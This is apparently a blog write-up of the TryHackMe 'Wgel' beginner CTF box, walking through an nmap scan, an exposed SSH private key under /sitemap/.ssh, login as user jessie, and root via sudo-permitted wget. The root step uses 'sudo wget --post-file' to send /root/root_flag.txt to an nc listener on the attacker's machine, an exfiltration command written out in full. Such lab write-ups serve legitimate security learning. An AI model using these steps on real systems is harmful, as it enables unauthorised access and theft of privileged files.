Posts Wgel CTF Writeup
Post
Cancel

Wgel CTF Writeup

Machine Info

Machine link: WgelCTF on TryHackMe This is an easy box for beginners (like me as of writing this post).


Objectives

Get the user flag and root flag.


User flag

Once we deploy the machine, give it a taste of nmap.

1
2
3
4
5
6
7
8
9
10
$ nmap 10.10.27.47                                       
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-17 21:28 EST
Nmap scan report for 10.10.27.47
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 29.36 seconds

Just a simple machine with simple ports. Going to http://10.10.27.47:80 give us the default apache page: picture 3

However reading the source code reveals this one line:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<pre>/etc/apache2/
|-- apache2.conf
|       `--  ports.conf
|-- mods-enabled
|       |-- *.load
|       `-- *.conf
|-- conf-enabled
|       `-- *.conf
|-- sites-enabled
|       `-- *.conf


 <!-- Jessie don't forget to udate the webiste -->
</pre>

Jessie must be a person (or perhaps an account) working on the machine. Other than that, this default page does not have anything else interesting. Next I scanned web page with a tool like dirb or dirbuster. I found a page with the url /sitemap, which appears to be a template for an e-commerce site, after reading everything on the page and it’s immediate subpages, I found nothing, surprisingly!

I skipped a day and caved in, after reading some other great writeups I got the id_rsa file inside /sitemap/.ssh. No idea why it’s there, but I got it anyway.

An id-rsa file contains a secret key used for SSH authentication, further info here. We can use it to access the machine, but we still need a username. As you probably recall, 2 paragraphs ago, I said that Jessie may be a user on the machine. It takes nothing to try, right?

1
2
3
4
5
6
7
8
9
10
11
12
$ ssh -i id_rsa jessie@10.10.27.47
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


8 packages can be updated.
8 updates are security updates.

jessie@CorpOne:~$

Unsurprisingly, it works. Running a few other commands can get us halfway there, I hope. Finding the user flag:

1
2
3
4
jessie@CorpOne:~$ find | grep flag
./Documents/user_flag.txt
jessie@CorpOne:~$ cat ./Documents/user_flag.txt
057c67131c3d5e42dd5cd30censored

A simple find and we got it.


Root flag

Let’s see if we can run anything with sudo on this machine:

1
2
3
4
5
6
7
8
jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

Well well well, gotcha! We can run wget with root privilege. wget is a tool for downloading and uploading file through http, https or ftp. For this we need a server to receive incoming requests, nc will do fine

On our machine, run nc:

1
2
$ nc -lvp 10000
listening on [any] 10000 ...

On the other machine, run wget with the --post-file param:

1
2
3
4
jessie@CorpOne:~$ sudo wget --post-file /root/root_flag.txt [yourmachineIP]:10000
--2020-12-18 04:52:51--  http://[yourmachineIP]:10000/
Connecting to [yourmachineIP]:10000... connected.
HTTP request sent, awaiting response... 

On our machine, we receive the following request:

1
2
3
4
5
6
7
8
9
10
POST / HTTP/1.1
User-Agent: Wget/1.17.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: [yourmachineIP]:10000
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

b1b968b37519ad1daa6408188censored

Further reading

  1. Privilege Escalation - wget
  2. wget manual --post-file
This post is licensed under CC BY 4.0 by the author.